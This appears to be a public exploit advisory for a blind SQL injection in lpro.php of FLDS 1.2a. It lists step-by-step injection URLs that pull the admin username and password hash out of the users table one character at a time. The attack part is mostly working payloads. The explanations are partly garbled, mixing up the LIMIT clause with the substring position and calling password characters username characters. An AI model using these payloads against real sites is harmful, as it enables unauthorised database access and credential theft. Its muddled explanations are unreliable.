FLDS version 1.2a suffers from a blind SQL injection vulnerability in lpro.php.
eeca86bfa60726d6d88db68e98029bc47a279b2dd021a83f352a48710f441c60
#########################################################################################################################
[+] FLDS 1.2a lpro.php (id) Blind SQL Injection Vulnerability
[+] Discovered By SirGod
[+] Greetz : All my friends
#########################################################################################################################
[+] Blind SQL Injection
- Get username :
http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT
username from users limit 0,1),1,1))>96
Query is true(page loads normally).Going to next ascii char.
http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT
username from users limit 0,1),1,1))>97
Query is false, first char of username is ascii(97) which is "a"
Then move to next char of the username.Change the limit 1,1 to 2,1
http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT
username from users limit 0,1),2,1))>99
Query is true(page loads normally).Going to next ascii char.
http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT
username from users limit 0,1),2,1))>100
Query is false,second char of username is ascii(100) which is "d"
And so on ... change the limit : 1,1 then 2,1 then 3,1 ... Username
is : admin (Example)
- Get password (hash) :
http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT
password from users limit 0,1),1,1))>49
Query is true(page loads normally).Going to next ascii char.
http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT
password from users limit 0,1),1,1))>50
Query is false, first char of username is ascii(50) which is "2" .
Then move to next char of the password hash.Change the limit 1,1 to 2,1
http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT
password from users limit 0,1),2,1))>48
Query is true(page loads normally).Going to next ascii char.
http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT
password from users limit 0,1),2,1))>49
Query is false, first char of username is ascii(49) which is "1"
And so on ... change the limit : 1,1 then 2,1 then 3,1 ... Password
hash is : 21232f297a57a5a743894a0e4a801fc3 (Example)
#########################################################################################################################